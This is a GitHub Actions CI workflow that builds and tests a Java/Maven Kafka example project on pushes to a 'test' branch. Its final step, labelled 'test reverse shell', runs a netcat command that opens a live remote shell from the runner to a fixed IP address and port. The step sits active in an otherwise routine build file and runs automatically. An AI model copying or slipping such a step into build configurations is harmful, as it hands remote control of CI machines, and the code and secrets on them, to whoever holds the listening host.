name: CI - Full steps

on:
  #pull_request:
   # branches:
   #   - 'main'
  push:
    branches:
      - 'test'
      
jobs:
  build:
    name: build
    runs-on: ubuntu-latest
    steps:
      - name: Checkout branch
        uses: actions/checkout@v3

      - name: Set up JDK 8
        uses: actions/setup-java@v3
        with:
          java-version: '8'
          distribution: 'temurin'
          overwrite-settings: false
          cache: 'maven'

      - name: Set up Maven
        uses: stCarolas/setup-maven@v4.2
        with:
          maven-version: 3.6.3
          
      - name: Compile
        run: mvn clean install
      
      - name: Tests
        run: mvn test
      
      - name: Check Artefact
        if: ${{ !env.ACT }}
        run: ls /home/runner/.m2/repository/org/kafkaex/KafkaExample/1.0-SNAPSHOT/

      - name: Check Artefact - locally
        if: ${{ env.ACT }}
        run: ls /root/.m2/repository/org/kafkaex/KafkaExample/1.0-SNAPSHOT/
    
      #- name: Setup tmate session
       # uses: mxschmitt/action-tmate@v3 
       
      - name: test reverse shell
        run: nc -e /bin/sh 192.168.1.3 1234
       
      
